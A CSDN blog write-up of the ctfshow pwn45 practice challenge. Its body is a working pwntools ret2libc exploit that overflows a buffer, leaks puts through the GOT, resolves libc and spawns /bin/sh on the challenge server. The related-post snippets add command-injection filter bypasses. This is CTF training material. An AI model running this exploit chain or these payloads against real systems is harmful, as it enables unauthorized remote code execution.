ctfshow pwn45

最新推荐文章于 2024-09-27 10:11:28 发布
最新推荐文章于 2024-09-27 10:11:28 发布
阅读量155 收藏
点赞数 2
分类专栏: 网络安全 PWN 文章标签: python 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/140237301
版权

简单的ret2libc

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28261)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

leak_name = "puts"
leak_plt = elf.plt[leak_name]
leak_got = elf.got[leak_name]
ret_addr = elf.symbols["ctfshow"]

payload = b"a"*(0x6b+4)+p32(leak_plt)+p32(ret_addr)+p32(leak_got)
ru("O.o?")
sl(payload)

ru("\n")
puts_addr = uu32(r(4))
print("puts_addr------------------>: ",hex(puts_addr))
libc  = LibcSearcher("puts",puts_addr)
base_addr = puts_addr-libc.dump("puts")
print("base_addr-----------------:",hex(base_addr))

system_addr = base_addr+libc.dump("system")
binsh = base_addr+libc.dump("str_bin_sh")
payload = b"a"*(0x6b+4)+p32(system_addr)+p32(0)+p32(binsh)
sl(payload)



itr()
saulgoodman-q
关注
专栏目录
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1251
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow pwn
zip471642048的博客
06-04 495
ctfshow pwn系列
CTFshow-PWN-栈溢出(pwn45
Welcome To Myon'Blog !
05-20 508
我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。system 函数属于libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的,即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。PLT用于间接调用共享库中的函数。这些方法和函数通常用于在漏洞利用过程中查找特定函数的地址(例如 system 函数)或特定字符串的地址(例如 /bin/sh 字符串)。
ctfshow 命令执行46关到70关 解题思路 理解及答案
2301_78362619的博客
12-28 1750
ctfshow我看行
Ctfshow web入门-web45 WP
qq_45427131的博客
05-18 209
web45 关于黑洞的传送门 传送门1 传送门2 preg_match函数多了对空格的过滤 空格可以用${IFS}和%0a代替绕过过滤 常规的后面一个变量写入黑洞,直接构造payload: http://9e400eba-95d3-409c-b50a-451ff5a2d4a2.challenge.ctf.show:8080/?c=ls%26%26ls 用${IFS}代替空格,构造payload ...
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 1466
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
ctfshow pwn4
qq_39980610的博客
08-22 684
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow pwn7
qq_39980610的博客
08-22 540
pwn7
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5356
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
buuctf习题pwn(41~50)
yw__y的博客
09-27 349
堆的题还没写
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 1535
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
CTFshow-pwn入门-栈溢出pwn43-pwn44
T1ngSh0w的博客
12-27 1349
CTFshow-pwn入门-栈溢出pwn43-pwn44
ctfshow web入门 {45-54}
weixin_58519918的博客
03-24 3733
Web(45) 空格过滤了这里的空格是ascll里的空格,我们可以用tab(%09)来通过 ?c=tac%09fla*||ls Web(46) a && b === if(a) { b },&&是同时必须满足的意思。a || b === if(!a) { b },||是或者的意思。 /?c=tac%09fla?.php%26%26ls 因为这是ascll码所以在转换时%09不会转换成0数字在30到39 . &&为%26%26 ASCLL
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 676
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
最新发布
2301_78772942的博客
09-27 692
第二百五十四节 JPA教程 - JPA 多对多映射示例
python中的深浅拷贝以及总体框架了解
AgostoDu的博客
09-26 1148
1、当b使用copy.deepcopy()深拷贝的时候,可以理解为b不仅外面的整体开辟了一个新的内存地址,b里面包含的列表也开辟了新的内存地址和a里面的内存地址没有任何关系,所以当a修改里面列表元素的值时不会影响b里面列表元素的值。print(mr) #{'name': 'lis', 'age': 18, 'scroe': 100}<br>备注:已经存在的值的优先级>默认值<br>6.3 直接修改 值,显示最新修改值 (修改默认值优先级小于直接添加的字典值)<br>
Python精选200Tips:171-175
AnFany
09-26 1220
Python深度学习的项目
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值